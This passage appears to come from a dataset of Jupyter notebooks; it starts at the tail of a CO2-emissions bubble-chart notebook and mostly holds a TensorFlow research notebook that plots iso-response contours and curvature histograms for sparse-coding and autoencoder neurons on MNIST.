\"Africa\",\n \"Oceania\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"Africa\",\n \"Africa\",\n \"Europe\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Europe\",\n \"Oceania\",\n \"Africa\",\n \"Africa\",\n \"North America\",\n \"Europe\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Africa\",\n \"Oceania\",\n \"Asia\",\n \"Europe\",\n \"Oceania\",\n \"Oceania\",\n \"Central America\",\n \"Africa\",\n \"Africa\",\n \"Oceania\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Asia\",\n \"Central America\",\n \"Oceania\",\n \"South America\",\n \"South America\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Africa\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"Africa\",\n \"North America\",\n \"North America\",\n \"North America\",\n \"North 
America\",\n \"Oceania\",\n \"Africa\",\n \"Asia\",\n \"Europe\",\n \"Africa\",\n \"Africa\",\n \"Asia\",\n \"Europe\",\n \"Europe\",\n \"Oceania\",\n \"Africa\",\n \"Asia\",\n \"Africa\",\n \"Europe\",\n \"Asia\",\n \"Africa\",\n \"South America\",\n \"Europe\",\n \"Europe\",\n \"Asia\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Oceania\",\n \"North America\",\n \"Africa\",\n \"Asia\",\n \"Asia\",\n \"Oceania\",\n \"Africa\",\n \"Europe\",\n \"Asia\",\n \"Europe\",\n \"North America\",\n \"South America\",\n \"Asia\",\n \"Oceania\",\n \"South America\",\n \"Asia\",\n \"Asia\",\n \"Africa\",\n \"Africa\"\n ]\n }\n },\n config={\n \"circularType\": \"bubble\",\n \"colorBy\": \"Continent\",\n \"graphType\": \"Circular\",\n \"hierarchy\": [\n \"Continent\",\n \"Country\"\n ],\n \"theme\": \"paulTol\",\n \"title\": \"Annual CO2 Emmisions in 2018\"\n },\n width=613,\n height=613,\n events=CXEvents(),\n after_render=[],\n other_init_params={\n \"version\": 35,\n \"events\": False,\n \"info\": False,\n \"afterRenderInit\": False,\n \"noValidate\": True\n }\n)\n\ndisplay = CXNoteBook(cx) \ndisplay.render(output_file=\"bubble_4.html\") \n",
"_____no_output_____"
]
]
] | [
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
]
] |
cb28fc5b6e03fb1917153f91b3c745dc764f2c3b | 42,516 | ipynb | Jupyter Notebook | tf1x/vis/vis_deep_iso_contours.ipynb | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-04-27T17:19:31.000Z | 2021-11-07T03:37:59.000Z | tf1x/vis/vis_deep_iso_contours.ipynb | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2018-03-21T01:16:25.000Z | 2022-02-10T00:21:58.000Z | tf1x/vis/vis_deep_iso_contours.ipynb | dpaiton/DeepSparseCoding | 5ea01fa8770794df5e13743aa3f2d85297c27eb1 | [
"MIT"
] | 12 | 2017-02-01T19:49:57.000Z | 2021-12-08T03:16:58.000Z | 44.753684 | 139 | 0.616497 | [
[
[
"## Imports",
"_____no_output_____"
]
],
[
[
"import os\nimport sys\n%env CUDA_VISIBLE_DEVICES=0\n%matplotlib inline",
"_____no_output_____"
],
[
"import pickle\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nfrom matplotlib.ticker import FormatStrFormatter\nimport tensorflow as tf\n\nroot_path = os.path.dirname(os.path.dirname(os.path.dirname(os.getcwd())))\nif root_path not in sys.path: sys.path.append(root_path)\n\nfrom DeepSparseCoding.tf1x.data.dataset import Dataset\nimport DeepSparseCoding.tf1x.data.data_selector as ds\nimport DeepSparseCoding.tf1x.utils.data_processing as dp\nimport DeepSparseCoding.tf1x.utils.plot_functions as pf\nimport DeepSparseCoding.tf1x.analysis.analysis_picker as ap",
"_____no_output_____"
],
[
"class lambda_params(object):\n def __init__(self, lamb=None):\n self.model_type = \"lambda\"\n self.model_name = \"lambda_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False\n self.activation_function = lamb\n\nclass mlp_params(object):\n def __init__(self):\n self.model_type = \"mlp\"\n self.model_name = \"mlp_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False\n\nclass lca_512_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_512_vh\"\n self.version = \"0.0\"\n self.save_info = \"analysis_train_carlini_targeted\"\n self.overwrite_analysis_log = False\n\nclass lca_768_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_768_mnist\"\n self.version = \"0.0\"\n #self.save_info = \"analysis_train_carlini_targeted\" # for vh\n self.save_info = \"analysis_test_carlini_targeted\" # for mnist\n self.overwrite_analysis_log = False\n\nclass lca_1024_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_1024_vh\"\n self.version = \"0.0\"\n self.save_info = \"analysis_train_carlini_targeted\"\n self.overwrite_analysis_log = False\n \nclass lca_1536_params(object):\n def __init__(self):\n self.model_type = \"lca\"\n self.model_name = \"lca_1536_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False\n\nclass ae_deep_params(object):\n def __init__(self):\n self.model_type = \"ae\"\n self.model_name = \"ae_deep_mnist\"\n self.version = \"0.0\"\n self.save_info = \"analysis_test_carlini_targeted\"\n self.overwrite_analysis_log = False",
"_____no_output_____"
],
[
"lamb = lambda x : tf.reduce_sum(tf.square(x), axis=1, keepdims=True)\n#lamb = lambda x : x / tf.reduce_sum(tf.square(x), axis=1, keepdims=True)\n\nparams_list = [ae_deep_params()]#lca_768_params(), lca_1536_params()]\n\nfor params in params_list:\n params.model_dir = (os.path.expanduser(\"~\")+\"/Work/Projects/\"+params.model_name)\n\nanalyzer_list = [ap.get_analyzer(params.model_type) for params in params_list]",
"_____no_output_____"
],
[
"for analyzer, params in zip(analyzer_list, params_list):\n analyzer.setup(params)\n if(hasattr(params, \"activation_function\")):\n analyzer.model_params.activation_function = params.activation_function\n analyzer.setup_model(analyzer.model_params)\n analyzer.load_analysis(save_info=params.save_info)\n analyzer.model_name = params.model_name",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n if(analyzer.analysis_params.model_type.lower() != \"lca\"\n and analyzer.analysis_params.model_type.lower() != \"lambda\"):\n pre_images = np.stack([analyzer.neuron_vis_output[\"optimal_stims\"][target_id][-1].reshape(28,28)\n for target_id in range(len(analyzer.analysis_params.neuron_vis_targets))], axis=0)\n pre_image_fig = pf.plot_weights(pre_images, title=analyzer.model_name+\" pre-images\", figsize=(4,8))\n pre_image_fig.savefig(analyzer.analysis_out_dir+\"/vis/pre_images.png\", transparent=True,\n bbox_inches=\"tight\", pad_inches=0.01)",
"_____no_output_____"
],
[
"#available_indices = [ 30, 45, 101, 223, 283, 335, 388, 491, 558, 571, 572,\n# 590, 599, 606, 619, 629, 641, 652, 693, 722, 724, 749,\n# 769, 787, 812, 819, 824, 906, 914, 927, 987, 1134, 1186,\n# 1196, 1297, 1376, 1409, 1534]\n#available_indices = np.array(range(analyzer.model.get_num_latent()))\navailable_indices = [2, 6, 8, 18, 21, 26]",
"_____no_output_____"
],
[
"step_idx = -1\n\nfor analyzer in analyzer_list:\n analyzer.available_indices = available_indices#np.array(range(analyzer.model.get_num_latent()))\n analyzer.target_neuron_idx = analyzer.available_indices[0]\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n bf0 = analyzer.bf_stats[\"basis_functions\"][analyzer.target_neuron_idx]\n else: \n bf0 = analyzer.neuron_vis_output[\"optimal_stims\"][analyzer.target_neuron_idx][step_idx]\n bf0 = bf0.reshape(np.prod(analyzer.model.get_input_shape()[1:]))\n bf0 = bf0 / np.linalg.norm(bf0)\n \n fig, axes = plt.subplots(1, 2, figsize=(10,4))\n \n ax = pf.clear_axis(axes[0])\n ax.imshow(bf0.reshape(int(np.sqrt(bf0.size)), int(np.sqrt(bf0.size))), cmap=\"Greys_r\")#, vmin=0.0, vmax=1.0)\n ax.set_title(\"Optimal\\ninput image\")\n \n if(analyzer.analysis_params.model_type.lower() != \"lca\"):\n axes[1].plot(analyzer.neuron_vis_output[\"loss\"][analyzer.target_neuron_idx])\n axes[1].set_title(\"Optimization loss\")\n \n plt.show()",
"_____no_output_____"
],
[
"def find_orth_vect(matrix):\n rand_vect = np.random.rand(matrix.shape[0], 1)\n new_matrix = np.hstack((matrix, rand_vect))\n candidate_vect = np.zeros(matrix.shape[1]+1)\n candidate_vect[-1] = 1\n orth_vect = np.linalg.lstsq(new_matrix.T, candidate_vect, rcond=None)[0] # [0] indexes lst-sqrs solution\n orth_vect = np.squeeze((orth_vect / np.linalg.norm(orth_vect)).T) \n return orth_vect",
"_____no_output_____"
],
[
"def get_rand_vectors(bf0, num_orth_directions):\n rand_vectors = bf0.T[:,None] # matrix of alternate vectors\n for orth_idx in range(num_orth_directions):\n tmp_bf1 = find_orth_vect(rand_vectors)\n rand_vectors = np.append(rand_vectors, tmp_bf1[:,None], axis=1)\n return rand_vectors.T[1:, :] # [num_vectors, vector_length]",
"_____no_output_____"
],
[
"def get_alt_vectors(bf0, bf1s):\n alt_vectors = bf0.T[:,None] # matrix of alternate vectors\n for tmp_bf1 in bf1s:\n tmp_bf1 = np.squeeze((tmp_bf1 / np.linalg.norm(tmp_bf1)).T)\n alt_vectors = np.append(alt_vectors, tmp_bf1[:,None], axis=1)\n return alt_vectors.T[1:, :] # [num_vectors, vector_length]",
"_____no_output_____"
],
[
"def get_norm_activity(analyzer, neuron_id_list, stim0_list, stim1_list, num_imgs):\n # Construct point dataset\n \n #x_pts = np.linspace(-0.5, 19.5, int(np.sqrt(num_imgs)))\n #y_pts = np.linspace(-10.0, 10.0, int(np.sqrt(num_imgs)))\n x_pts = np.linspace(-0.5, 3.5, int(np.sqrt(num_imgs)))\n y_pts = np.linspace(-2.0, 2.0, int(np.sqrt(num_imgs)))\n #x_pts = np.linspace(0.9, 1.1, int(np.sqrt(num_imgs)))\n #y_pts = np.linspace(-0.1, 0.1, int(np.sqrt(num_imgs)))\n #x_pts = np.linspace(0.999, 1.001, int(np.sqrt(num_imgs)))\n #y_pts = np.linspace(-0.001, 0.001, int(np.sqrt(num_imgs)))\n \n X_mesh, Y_mesh = np.meshgrid(x_pts, y_pts)\n proj_datapoints = np.stack([X_mesh.reshape(num_imgs), Y_mesh.reshape(num_imgs)], axis=1)\n\n out_dict = {\n \"norm_activity\": [],\n \"proj_neuron0\": [],\n \"proj_neuron1\": [],\n \"proj_v\": [],\n \"v\": [],\n \"proj_datapoints\": proj_datapoints,\n \"X_mesh\": X_mesh,\n \"Y_mesh\": Y_mesh}\n\n # TODO: This can be made to be much faster by compiling all of the stimulus into a single set and computing activations\n for neuron_id, stim0 in zip(neuron_id_list, stim0_list):\n activity_sub_list = []\n proj_neuron0_sub_list = []\n proj_neuron1_sub_list = []\n proj_v_sub_list = []\n v_sub_list = []\n for stim1 in stim1_list:\n proj_matrix, v = dp.bf_projections(stim0, stim1)\n proj_neuron0_sub_list.append(np.dot(proj_matrix, stim0).T) #project\n proj_neuron1_sub_list.append(np.dot(proj_matrix, stim1).T) #project\n proj_v_sub_list.append(np.dot(proj_matrix, v).T) #project\n v_sub_list.append(v)\n datapoints = np.stack([np.dot(proj_matrix.T, proj_datapoints[data_id,:])\n for data_id in range(num_imgs)], axis=0) #inject\n datapoints = dp.reshape_data(datapoints, flatten=False)[0]\n datapoints = {\"test\": Dataset(datapoints, lbls=None, ignore_lbls=None, rand_state=analyzer.rand_state)}\n datapoints = analyzer.model.reshape_dataset(datapoints, analyzer.model_params)\n activations = analyzer.compute_activations(datapoints[\"test\"].images)#, batch_size=int(np.sqrt(num_imgs)))\n activations = activations[:, neuron_id]\n activity_max = np.amax(np.abs(activations))\n activations = activations / (activity_max + 0.00001)\n activations = activations.reshape(int(np.sqrt(num_imgs)), int(np.sqrt(num_imgs)))\n activity_sub_list.append(activations)\n out_dict[\"norm_activity\"].append(activity_sub_list)\n out_dict[\"proj_neuron0\"].append(proj_neuron0_sub_list)\n out_dict[\"proj_neuron1\"].append(proj_neuron1_sub_list)\n out_dict[\"proj_v\"].append(proj_v_sub_list)\n out_dict[\"v\"].append(v_sub_list)\n return out_dict",
"_____no_output_____"
],
[
"analyzer = analyzer_list[0]\nstep_idx = -1\nnum_imgs = int(300**2)#int(228**2)\nmin_angle = 10\nuse_rand_orth = False\n\nnum_neurons = 2#1",
"_____no_output_____"
],
[
"if(use_rand_orth):\n target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)\n alt_stim_list = get_rand_vectors(stim0, num_neurons)\nelse:\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n target_neuron_indices = np.random.choice(analyzer.available_indices, num_neurons, replace=False)\n analyzer.neuron_angles = analyzer.get_neuron_angles(analyzer.bf_stats)[1] * (180/np.pi)\n alt_stim_list = []\n else:\n all_neuron_indices = np.random.choice(analyzer.available_indices, 2*num_neurons, replace=False)\n target_neuron_indices = all_neuron_indices[:num_neurons]\n orth_neuron_indices = all_neuron_indices[num_neurons:]\n\nif(analyzer.analysis_params.model_type.lower() == \"ae\"):\n neuron_vis_targets = np.array(analyzer.analysis_params.neuron_vis_targets)\n neuron_id_list = neuron_vis_targets[target_neuron_indices]\nelse:\n neuron_id_list = target_neuron_indices\nstim0_list = []\nstimid0_list = []\n\nfor neuron_id in target_neuron_indices:\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n stim0 = analyzer.bf_stats[\"basis_functions\"][neuron_id]\n else:\n stim0 = analyzer.neuron_vis_output[\"optimal_stims\"][neuron_id][step_idx]\n stim0 = stim0.reshape(np.prod(analyzer.model.get_input_shape()[1:])) # shape=[784]\n stim0 = stim0 / np.linalg.norm(stim0) # normalize length\n stim0_list.append(stim0)\n stimid0_list.append(neuron_id)\n if not use_rand_orth:\n if(analyzer.analysis_params.model_type.lower() == \"lca\"):\n gt_min_angle_indices = np.argwhere(analyzer.neuron_angles[neuron_id, :] > min_angle)\n sorted_angle_indices = np.argsort(analyzer.neuron_angles[neuron_id, gt_min_angle_indices], axis=0)\n vector_id = gt_min_angle_indices[sorted_angle_indices[0]].item()\n alt_stim = analyzer.bf_stats[\"basis_functions\"][vector_id]\n alt_stim = [np.squeeze(alt_stim.reshape(analyzer.model_params.num_pixels))]\n comparison_vector = get_alt_vectors(stim0, alt_stim)[0]\n alt_stim_list.append(comparison_vector)\n else:\n alt_stims = [analyzer.neuron_vis_output[\"optimal_stims\"][orth_neuron_idx][step_idx]\n for orth_neuron_idx in orth_neuron_indices]\n alt_stim_list = get_alt_vectors(stim0, alt_stims)",
"_____no_output_____"
]
],
[
[
"\"\"\"\nfor lambda tests\n\"\"\"\none_hot = np.array([1,1]+[0]*(analyzer.model.get_input_shape()[1]-2))\none_hot = one_hot / np.linalg.norm(one_hot)\nhots = [np.roll(one_hot, shift=shift) for shift in range(2*num_neurons)]\nstim0_list = hots[:num_neurons]\nalt_stim_list = hots[num_neurons:]\nneuron_id_list = [0]*len(stim0_list)",
"_____no_output_____"
]
],
[
[
"out_dict = get_norm_activity(analyzer, neuron_id_list, stim0_list, alt_stim_list, num_imgs)",
"_____no_output_____"
],
[
"num_plots_y = num_neurons + 1 # extra dimension for example image\nnum_plots_x = num_neurons + 1 # extra dimension for example image\n\ngs0 = gridspec.GridSpec(num_plots_y, num_plots_x, wspace=0.1, hspace=0.1)\nfig = plt.figure(figsize=(10, 10))\ncmap = plt.get_cmap('viridis')\n\north_vectors = []\nfor neuron_loop_index in range(num_neurons): # rows\n for orth_loop_index in range(num_neurons): # columns\n norm_activity = out_dict[\"norm_activity\"][neuron_loop_index][orth_loop_index]\n proj_neuron0 = out_dict[\"proj_neuron0\"][neuron_loop_index][orth_loop_index]\n proj_neuron1 = out_dict[\"proj_neuron1\"][neuron_loop_index][orth_loop_index]\n proj_v = out_dict[\"proj_v\"][neuron_loop_index][orth_loop_index]\n orth_vectors.append(out_dict[\"v\"][neuron_loop_index][orth_loop_index])\n\n curve_plot_y_idx = neuron_loop_index + 1\n curve_plot_x_idx = orth_loop_index + 1\n curve_ax = pf.clear_axis(fig.add_subplot(gs0[curve_plot_y_idx, curve_plot_x_idx]))\n\n # NOTE: each subplot has a renormalized color scale\n # TODO: Add scale bar like in the lca inference plots\n vmin = np.min(norm_activity)\n vmax = np.max(norm_activity)\n\n levels = 5\n contsf = curve_ax.contourf(out_dict[\"X_mesh\"], out_dict[\"Y_mesh\"], norm_activity,\n levels=levels, vmin=vmin, vmax=vmax, alpha=1.0, antialiased=True, cmap=cmap)\n\n curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')\n curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='w', ec='w')\n curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),\n width=0.05, head_width=0.15, head_length=0.15, fc='k', ec='k')\n #curve_ax.arrow(0, 0, proj_neuron0[0].item(), proj_neuron0[1].item(),\n # width=0.05, head_width=0.15, head_length=0.15, fc='r', ec='r')\n #curve_ax.arrow(0, 0, proj_neuron1[0].item(), proj_neuron1[1].item(),\n # width=0.005, head_width=0.15, head_length=0.15, fc='w', ec='w')\n #curve_ax.arrow(0, 0, proj_v[0].item(), proj_v[1].item(),\n # width=0.05, head_width=0.05, head_length=0.15, fc='k', ec='k')\n\n #curve_ax.set_xlim([-0.5, 19.5])\n #curve_ax.set_ylim([-10, 10.0])\n curve_ax.set_xlim([-0.5, 3.5])\n curve_ax.set_ylim([-2, 2.0])\n #curve_ax.set_xlim([0.999, 1.001])\n #curve_ax.set_ylim([-0.001, 0.001])\n \nfor plot_y_id in range(num_plots_y):\n for plot_x_id in range(num_plots_x):\n if plot_y_id > 0 and plot_x_id == 0:\n bf_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))\n bf_resh = stim0_list[plot_y_id-1].reshape((int(np.sqrt(np.prod(analyzer.model.params.data_shape))),\n int(np.sqrt(np.prod(analyzer.model.params.data_shape)))))\n bf_ax.imshow(bf_resh, cmap=\"Greys_r\")\n if plot_y_id == 1:\n bf_ax.set_title(\"Target vectors\", color=\"r\", fontsize=16)\n if plot_y_id == 0 and plot_x_id > 0:\n #comparison_img = comparison_vectors[plot_x_id-1, :].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),\n # int(np.sqrt(np.prod(analyzer.model.params.data_shape))))\n orth_img = orth_vectors[plot_x_id-1].reshape(int(np.sqrt(np.prod(analyzer.model.params.data_shape))),\n int(np.sqrt(np.prod(analyzer.model.params.data_shape))))\n orth_ax = pf.clear_axis(fig.add_subplot(gs0[plot_y_id, plot_x_id]))\n orth_ax.imshow(orth_img, cmap=\"Greys_r\")\n if plot_x_id == 1:\n #orth_ax.set_ylabel(\"Orthogonal vectors\", color=\"k\", fontsize=16)\n orth_ax.set_title(\"Orthogonal vectors\", color=\"k\", 
fontsize=16)\n\nplt.show()\nfig.savefig(analyzer.analysis_out_dir+\"/vis/iso_contour_grid_04.png\")",
"_____no_output_____"
]
],
[
[
"### Curvature comparisons",
"_____no_output_____"
]
],
[
[
"id_list = [1, 1]#, 3]\nfor analyzer, list_index in zip(analyzer_list, id_list):\n analyzer.bf0 = stim0_list[list_index]\n analyzer.bf_id0 = stimid0_list[list_index]\n analyzer.bf0_slice_scale = 0.80 # between -1 and 1",
"_____no_output_____"
],
[
"\"\"\"\n* Compute a unit vector that is in the same plane as a given basis function pair (B1,B2) and\n is orthogonal to B1, where B1 is the target basis for comparison and B2 is selected from all other bases.\n* Construct a line of data points in this plane\n* Project the data points into image space, compute activations, plot activations\n\"\"\"\nfor analyzer in analyzer_list:\n analyzer.pop_num_imgs = 100\n \n #orthogonal_list = [idx for idx in range(analyzer.bf_stats[\"num_outputs\"])]\n orthogonal_list = [idx for idx in range(analyzer.bf_stats[\"num_outputs\"]) if idx != analyzer.bf_id0]\n analyzer.num_orthogonal = len(orthogonal_list)\n \n pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))\n pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.pop_num_imgs))\n pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)\n full_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.pop_num_imgs**2),\n pop_Y.reshape(analyzer.pop_num_imgs**2)], axis=1) # construct a grid\n \n # find a location to take a slice\n # to avoid having to exactly find a point we use a relative position\n x_target = pop_x_pts[int(analyzer.bf0_slice_scale*analyzer.pop_num_imgs)]\n \n slice_indices = np.where(full_pop_proj_datapoints[:,0]==x_target)[0]\n analyzer.pop_proj_datapoints = full_pop_proj_datapoints[slice_indices,:] # slice grid\n \n analyzer.pop_datapoints = [None,]*analyzer.num_orthogonal\n for pop_idx, tmp_bf_id1 in enumerate(orthogonal_list):\n tmp_bf1 = analyzer.bf_stats[\"basis_functions\"][tmp_bf_id1].reshape((analyzer.model_params.num_pixels))\n tmp_bf1 /= np.linalg.norm(tmp_bf1)\n tmp_proj_matrix, v = analyzer.bf_projections(analyzer.bf0, tmp_bf1) \n analyzer.pop_datapoints[pop_idx] = np.dot(analyzer.pop_proj_datapoints, tmp_proj_matrix)#[slice_indices,:]\n \n analyzer.pop_datapoints = np.reshape(np.stack(analyzer.pop_datapoints, axis=0),\n [analyzer.num_orthogonal*analyzer.pop_num_imgs, analyzer.model_params.num_pixels])\n \n analyzer.pop_datapoints = dp.reshape_data(analyzer.pop_datapoints, flatten=False)[0]\n analyzer.pop_datapoints = {\"test\": Dataset(analyzer.pop_datapoints, lbls=None,\n ignore_lbls=None, rand_state=analyzer.rand_state)}\n #analyzer.pop_datapoints = analyzer.model.preprocess_dataset(analyzer.pop_datapoints,\n # params={\"whiten_data\":analyzer.model_params.whiten_data,\n # \"whiten_method\":analyzer.model_params.whiten_method,\n # \"whiten_batch_size\":10})\n analyzer.pop_datapoints = analyzer.model.reshape_dataset(analyzer.pop_datapoints, analyzer.model_params)\n #analyzer.pop_datapoints[\"test\"].images /= np.max(np.abs(analyzer.pop_datapoints[\"test\"].images))\n #analyzer.pop_datapoints[\"test\"].images *= 10#analyzer.analysis_params.input_scale",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n pop_activations = analyzer.compute_activations(analyzer.pop_datapoints[\"test\"].images)[:, analyzer.bf_id0]\n pop_activations = pop_activations.reshape([analyzer.num_orthogonal, analyzer.pop_num_imgs])\n analyzer.pop_norm_activity = pop_activations / (np.amax(np.abs(pop_activations)) + 0.0001)",
"_____no_output_____"
],
[
"\"\"\"\n* Construct the set of unit-length bases that are orthogonal to B0 (there should be B0.size-1 of them)\n* Construct a line of data points in each plane defined by B0 and a given orthogonal basis\n* Project the data points into image space, compute activations, plot activations\n\"\"\"\nfor analyzer in analyzer_list:\n analyzer.rand_pop_num_imgs = 100\n analyzer.rand_num_orthogonal = analyzer.bf_stats[\"num_inputs\"]-1\n \n pop_x_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))\n pop_y_pts = np.linspace(-2.0, 2.0, int(analyzer.rand_pop_num_imgs))\n pop_X, pop_Y = np.meshgrid(pop_x_pts, pop_y_pts)\n full_rand_pop_proj_datapoints = np.stack([pop_X.reshape(analyzer.rand_pop_num_imgs**2),\n pop_Y.reshape(analyzer.rand_pop_num_imgs**2)], axis=1) # construct a grid\n \n # find a location to take a slice\n x_target = pop_x_pts[int(analyzer.bf0_slice_scale*np.sqrt(analyzer.rand_pop_num_imgs))]\n \n slice_indices = np.where(full_rand_pop_proj_datapoints[:,0]==x_target)[0]\n analyzer.rand_pop_proj_datapoints = full_rand_pop_proj_datapoints[slice_indices,:] # slice grid\n \n orth_col_matrix = analyzer.bf0.T[:,None]\n analyzer.rand_pop_datapoints = [None,]*analyzer.rand_num_orthogonal\n for pop_idx in range(analyzer.rand_num_orthogonal):\n v = find_orth_vect(orth_col_matrix)\n orth_col_matrix = np.append(orth_col_matrix, v[:,None], axis=1)\n tmp_proj_matrix = np.stack([analyzer.bf0, v], axis=0)\n analyzer.rand_pop_datapoints[pop_idx] = np.dot(analyzer.rand_pop_proj_datapoints,\n tmp_proj_matrix)\n\n analyzer.rand_pop_datapoints = np.reshape(np.stack(analyzer.rand_pop_datapoints, axis=0),\n [analyzer.rand_num_orthogonal*analyzer.rand_pop_num_imgs, analyzer.model_params.num_pixels])\n\n analyzer.rand_pop_datapoints = dp.reshape_data(analyzer.rand_pop_datapoints, flatten=False)[0]\n analyzer.rand_pop_datapoints = {\"test\": Dataset(analyzer.rand_pop_datapoints, lbls=None,\n ignore_lbls=None, rand_state=analyzer.rand_state)}\n #analyzer.rand_pop_datapoints = analyzer.model.preprocess_dataset(analyzer.rand_pop_datapoints,\n # params={\"whiten_data\":analyzer.model.params.whiten_data,\n # \"whiten_method\":analyzer.model.params.whiten_method,\n # \"whiten_batch_size\":10})\n analyzer.rand_pop_datapoints = analyzer.model.reshape_dataset(analyzer.rand_pop_datapoints,\n analyzer.model_params)\n #analyzer.rand_pop_datapoints[\"test\"].images /= np.max(np.abs(analyzer.rand_pop_datapoints[\"test\"].images))\n #analyzer.rand_pop_datapoints[\"test\"].images *= 10# analyzer.analysis_params.input_scale",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n rand_pop_activations = analyzer.compute_activations(analyzer.rand_pop_datapoints[\"test\"].images)[:,\n analyzer.bf_id0]\n rand_pop_activations = rand_pop_activations.reshape([analyzer.rand_num_orthogonal, analyzer.rand_pop_num_imgs])\n analyzer.rand_pop_norm_activity = rand_pop_activations / (np.amax(np.abs(rand_pop_activations)) + 0.0001)",
"_____no_output_____"
],
[
"for analyzer in analyzer_list:\n analyzer.bf_coeffs = [\n np.polynomial.polynomial.polyfit(analyzer.pop_proj_datapoints[:,1],\n analyzer.pop_norm_activity[orthog_idx,:], deg=2)\n for orthog_idx in range(analyzer.num_orthogonal)]\n analyzer.bf_fits = [\n np.polynomial.polynomial.polyval(analyzer.pop_proj_datapoints[:,1], coeff)\n for coeff in analyzer.bf_coeffs]\n analyzer.bf_curvatures = [np.polyder(fit, m=2) for fit in analyzer.bf_fits]\n \n analyzer.rand_coeffs = [np.polynomial.polynomial.polyfit(analyzer.rand_pop_proj_datapoints[:,1],\n analyzer.rand_pop_norm_activity[orthog_idx,:], deg=2)\n for orthog_idx in range(analyzer.rand_num_orthogonal)]\n analyzer.rand_fits = [np.polynomial.polynomial.polyval(analyzer.rand_pop_proj_datapoints[:,1], coeff)\n for coeff in analyzer.rand_coeffs]\n analyzer.rand_curvatures = [np.polyder(fit, m=2) for fit in analyzer.rand_fits]",
"_____no_output_____"
],
[
"analyzer_idx = 0\n\nbf_curvatures = np.stack(analyzer_list[analyzer_idx].bf_coeffs, axis=0)[:,2]\nrand_curvatures = np.stack(analyzer_list[analyzer_idx].rand_coeffs, axis=0)[:,2]\n\nnum_bins = 100\nbins = np.linspace(-0.2, 0.01, num_bins)\nbar_width = np.diff(bins).min()\nbf_hist, bin_edges = np.histogram(bf_curvatures.flatten(), bins)\nrand_hist, _ = np.histogram(rand_curvatures.flatten(), bins)\nbin_left, bin_right = bin_edges[:-1], bin_edges[1:]\nbin_centers = bin_left + (bin_right - bin_left)/2\n\nfig, ax = plt.subplots(1, figsize=(16,9))\n\nax.bar(bin_centers, rand_hist, width=bar_width, log=False, color=\"g\", alpha=0.5, align=\"center\",\n label=\"Random Projection\")\nax.bar(bin_centers, bf_hist, width=bar_width, log=False, color=\"r\", alpha=0.5, align=\"center\",\n label=\"BF Projection\")\n\nax.set_xticks(bin_left, minor=True)\nax.set_xticks([bin_left[0], bin_left[int(len(bin_left)/2)], 0.0], minor=False)\nax.xaxis.set_major_formatter(FormatStrFormatter(\"%0.3f\"))\nfor tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(24) \nfor tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(24) \n\nax.set_title(\"Histogram of Curvatures\", fontsize=32)\nax.set_xlabel(\"Curvature\", fontsize=32)\nax.set_ylabel(\"Count\", fontsize=32)\nax.legend(loc=2, fontsize=32)\nfig.savefig(analyzer.analysis_out_dir+\"/vis/histogram_of_curvatures_bf0id\"+str(analyzer.bf_id0)+\".png\",\n transparent=True, bbox_inches=\"tight\", pad_inches=0.01)\nplt.show()",
"_____no_output_____"
]
],
[
[
"for analyzer in analyzer_list:\n analyzer.orth_col_matrix = analyzer.bf0.T[:,None]\n analyzer.rand_num_orthogonal = np.prod(analyzer.model.get_input_shape()[1:])-1\n\n for pop_idx in range(analyzer.rand_num_orthogonal):\n v = find_orth(analyzer.orth_col_matrix)\n analyzer.orth_col_matrix = np.append(analyzer.orth_col_matrix, v[:,None], axis=1)\n\n if all(np.abs(np.dot(analyzer.bf0, col)) < 1e-9 for col in analyzer.orth_col_matrix[:,1:].T):\n print(\"Success\")\n else:\n count = np.sum([int(np.abs(np.dot(analyzer.bf0, col)) < 1e-9) for col in analyzer.orth_col_matrix[:,1:].T])\n print(\"Failure,\", count, \"were non-orthogonal\")",
